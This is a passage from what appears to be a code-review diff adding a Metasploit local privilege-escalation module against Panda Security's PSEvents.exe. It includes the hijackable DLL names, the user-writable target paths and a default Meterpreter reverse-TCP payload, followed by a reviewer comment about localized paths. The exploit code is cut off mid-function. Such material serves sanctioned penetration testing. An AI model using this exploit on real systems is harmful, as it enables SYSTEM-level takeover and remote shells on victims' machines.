modules/exploits/windows/local/panda_psevents.rb

```diff
@@ -0,0 +1,108 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/exploit/exe'
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Exploit::EXE
+  include Exploit::FileDropper
+  include Post::File
+
+  def initialize(info={})
+    super( update_info( info,
+      'Name'          => 'Panda Security PSEvents Privilege Escalation',
+      'Description'   => %q{
+        PSEvents.exe within several Panda Security products runs hourly with SYSTEM privileges.
+        When run, it checks a user writable folder for certain DLL files, and if any are found
+        they are automatically run.
+        Vulnerable Products:
+        Panda Global Protection 2016 (<=16.1.2)
+        Panda Antivirus Pro 2016 (<=16.1.2)
+        Panda Small Busines Protetion (<=16.1.2)
+        Panda Internet Security 2016 (<=16.1.2)
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        => [
+          "h00die <mike@stcyrsecurity.com>", # Module,
+          'Security-Assessment.com' # discovery
+        ],
+      'Platform'      => [ 'win' ],
+      'SessionTypes'  => [ 'meterpreter' ],
+      'Targets'       => [
+          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
+          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
+      ],
+      'DefaultTarget' => 0,
+      'DefaultOptions' => {
+        'payload' => 'windows/meterpreter/reverse_tcp',
+        'exitfunc' => 'seh'
+      },
+      'References'    => [
+        [
+          'EDB', '40020',
+          'URL', 'http://www.security-assessment.com/files/documents/advisory/Panda%20Security%20-%20Privilege%20Escalation.pdf',
+          'URL', 'http://www.pandasecurity.com/uk/support/card?id=100053'
+        ]
+      ],
+      'DisclosureDate'=> 'Jun 27 2016'
+    ))
+    register_options(
+      [
+        OptEnum.new('DLL', [ true, 'dll to create', 'CRYPTBASE.dll',
+                             ['WINHTTP.dll', 'VERSION.dll', 'bcryptPrimitives.dll', 'CRYPTBASE.dll', 'cryptnet.dll', 'WININET.dll']]),
+        OptInt.new('ListenerTimeout', [true, 'Number of seconds to wait for the exploit', 3610]),
+      ], self.class)
+  end
+
+  def get_path()
+    case sysinfo['OS']
+    when /Windows (7|8|10|2012|2008)/
+      return 'C:\\ProgramData\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171\\'
+    when /Windows (NT|XP)/
+      return 'C:\\Documents and Settings\\All Users\\Application Data\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171\\'
```

Comment:
It definitely would be better. These paths are localized, so this won't work on non-English systems